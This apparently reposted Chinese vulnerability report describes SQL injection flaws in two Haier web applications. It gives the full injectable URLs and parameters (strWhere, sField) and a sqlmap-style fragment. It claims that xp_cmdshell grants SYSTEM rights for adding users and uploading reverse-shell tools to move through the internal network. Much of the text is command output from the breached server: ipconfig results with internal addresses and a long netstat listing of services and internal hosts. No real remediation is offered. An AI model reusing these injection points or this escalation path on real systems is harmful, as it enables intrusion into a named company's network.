首页 » 漏洞 » 海尔某处注射dba/system权限/可内网渗透威胁内网安全

海尔某处注射dba/system权限/可内网渗透威胁内网安全

 

http://gopurchase.haier.com/GOPurchase/Common/C

onsultSupplyerBank.aspx?cId=inbankNo&cNm=inbankNm&strWhere=&selectType=0&selectI

ds=a" -p "strWhere"

strWhere参数

站库分离

16H数据库服务器~~~

默认自带 xp_cmdshell这玩意

QQ截图20151018220342.png

system权限,可添加用户,上传反弹工具进行内网渗透

code 区域
command standard output:

---



Windows IP Configuration





Ethernet adapter 本地连接 5:



Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 10.135.106.44

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 10.135.106.1



Ethernet adapter 本地连接 2:



Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 172.11.178.100

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . :

---

code 区域
Proto  Local Address          Foreign Address        State           PID

TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 1808

TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4

TCP 0.0.0.0:110 0.0.0.0:0 LISTENING 3040

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 752

TCP 0.0.0.0:383 0.0.0.0:0 LISTENING 4292

TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2916

TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4

TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 480

TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING 1560

TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING 1560

TCP 0.0.0.0:1035 0.0.0.0:0 LISTENING 1560

TCP 0.0.0.0:1038 0.0.0.0:0 LISTENING 1808

TCP 0.0.0.0:1078 0.0.0.0:0 LISTENING 2988

TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 2184

TCP 0.0.0.0:1521 0.0.0.0:0 LISTENING 2956

TCP 0.0.0.0:2030 0.0.0.0:0 LISTENING 2496

TCP 0.0.0.0:2100 0.0.0.0:0 LISTENING 2956

TCP 0.0.0.0:2301 0.0.0.0:0 LISTENING 4032

TCP 0.0.0.0:2381 0.0.0.0:0 LISTENING 4032

TCP 0.0.0.0:2383 0.0.0.0:0 LISTENING 2292

TCP 0.0.0.0:3339 0.0.0.0:0 LISTENING 2916

TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 4356

TCP 0.0.0.0:5053 0.0.0.0:0 LISTENING 1628

TCP 0.0.0.0:5555 0.0.0.0:0 LISTENING 2464

TCP 0.0.0.0:7778 0.0.0.0:0 LISTENING 2916

TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 2956

TCP 0.0.0.0:8228 0.0.0.0:0 LISTENING 224

TCP 0.0.0.0:8400 0.0.0.0:0 LISTENING 1560

TCP 0.0.0.0:8402 0.0.0.0:0 LISTENING 3804

TCP 0.0.0.0:10050 0.0.0.0:0 LISTENING 3680

TCP 0.0.0.0:17560 0.0.0.0:0 LISTENING 660

TCP 10.135.106.44:139 0.0.0.0:0 LISTENING 4

TCP 10.135.106.44:1063 10.135.106.44:8402 ESTABLISHED 1560

TCP 10.135.106.44:1080 10.135.106.44:1521 ESTABLISHED 2988

TCP 10.135.106.44:1081 10.135.106.44:1748 ESTABLISHED 2800

TCP 10.135.106.44:1091 10.135.106.44:1433 ESTABLISHED 6448

TCP 10.135.106.44:1433 10.135.7.221:38602 ESTABLISHED 2184

TCP 10.135.106.44:1433 10.135.106.44:1091 ESTABLISHED 2184

TCP 10.135.106.44:1433 192.168.50.2:2137 ESTABLISHED 2184

TCP 10.135.106.44:1433 192.168.50.2:2619 ESTABLISHED 2184

TCP 10.135.106.44:1521 10.135.106.44:1080 ESTABLISHED 2956

TCP 10.135.106.44:1748 0.0.0.0:0 LISTENING 2964

TCP 10.135.106.44:1748 10.135.106.44:1081 ESTABLISHED 2964

TCP 10.135.106.44:1754 0.0.0.0:0 LISTENING 2964

TCP 10.135.106.44:1808 0.0.0.0:0 LISTENING 2964

TCP 10.135.106.44:1809 0.0.0.0:0 LISTENING 2964

TCP 10.135.106.44:8402 10.135.106.44:1063 ESTABLISHED 3804

TCP 10.135.106.44:10050 10.138.106.101:54861 TIME_WAIT 0

TCP 10.135.106.44:10050 10.138.106.101:57608 TIME_WAIT 0

TCP 10.135.106.44:10050 10.138.106.101:58195 TIME_WAIT 0

TCP 10.135.106.44:10050 10.138.106.101:60777 TIME_WAIT 0

TCP 10.135.106.44:16389 0.0.0.0:0 LISTENING 2184

TCP 127.0.0.1:1036 127.0.0.1:1037 ESTABLISHED 1560

TCP 127.0.0.1:1037 127.0.0.1:1036 ESTABLISHED 1560

TCP 127.0.0.1:1068 0.0.0.0:0 LISTENING 3964

TCP 127.0.0.1:1068 127.0.0.1:3912 ESTABLISHED 3964

TCP 127.0.0.1:1071 0.0.0.0:0 LISTENING 1004

TCP 127.0.0.1:1071 127.0.0.1:1536 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1538 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1540 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1542 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1545 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1547 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1549 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1552 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1554 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1556 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1559 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1561 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1563 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1565 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1568 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1570 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1572 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1575 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1577 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1580 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1583 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1585 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1587 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1589 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1592 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1594 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1596 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1599 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1601 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1603 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1606 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1608 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1610 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1612 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1616 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1618 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1620 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1623 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1625 TIME_WAIT 0

TCP 127.0.0.1:1071 127.0.0.1:1627 TIME_WAIT 0

TCP 127.0.0.1:1075 0.0.0.0:0 LISTENING 3964

TCP 127.0.0.1:1077 0.0.0.0:0 LISTENING 996

TCP 127.0.0.1:1077 127.0.0.1:1535 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1537 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1539 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1541 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1544 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1546 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1548 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1551 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1553 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1555 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1558 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1560 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1562 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1564 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1567 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1569 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1571 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1574 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1576 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1579 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1582 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1584 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1586 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1588 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1591 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1593 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1595 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1598 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1600 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1602 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1605 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1607 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1609 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1611 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1615 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1617 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1619 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1622 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1624 TIME_WAIT 0

TCP 127.0.0.1:1077 127.0.0.1:1626 TIME_WAIT 0

TCP 127.0.0.1:1082 0.0.0.0:0 LISTENING 6284

TCP 127.0.0.1:1114 0.0.0.0:0 LISTENING 6528

TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 2184

TCP 127.0.0.1:1492 0.0.0.0:0 LISTENING 7196

TCP 127.0.0.1:1496 0.0.0.0:0 LISTENING 6708

TCP 127.0.0.1:1496 127.0.0.1:4026 ESTABLISHED 6708

TCP 127.0.0.1:3912 127.0.0.1:1068 ESTABLISHED 4292

TCP 127.0.0.1:4026 127.0.0.1:1496 ESTABLISHED 4292

TCP 127.0.0.1:42424 0.0.0.0:0 LISTENING 1396

TCP 172.11.178.100:139 0.0.0.0:0 LISTENING 4

TCP 172.11.178.100:16389 0.0.0.0:0 LISTENING 2184

UDP 0.0.0.0:161 *:* 3432

UDP 0.0.0.0:445 *:* 4

UDP 0.0.0.0:500 *:* 480

UDP 0.0.0.0:1058 *:* 3432

UDP 0.0.0.0:1434 *:* 3468

UDP 0.0.0.0:3456 *:* 1808

UDP 0.0.0.0:4500 *:* 480

UDP 10.135.106.44:123 *:* 860

UDP 10.135.106.44:137 *:* 4

UDP 10.135.106.44:138 *:* 4

UDP 127.0.0.1:123 *:* 860

UDP 127.0.0.1:3456 *:* 1808

UDP 172.11.178.100:123 *:* 860

想干嘛干嘛~!

漏洞证明:

如上

另外再送个sql注入

http://idea.haier.com//mas/front/live/ma

o?method=list&search=1001&sField=1&sOpr=like&sWord=1

sField 参数

QQ截图20151026014849.png

修复方案:

运维童鞋加把劲~

原文链接:海尔某处注射dba/system权限/可内网渗透威胁内网安全,转载请注明来源!

0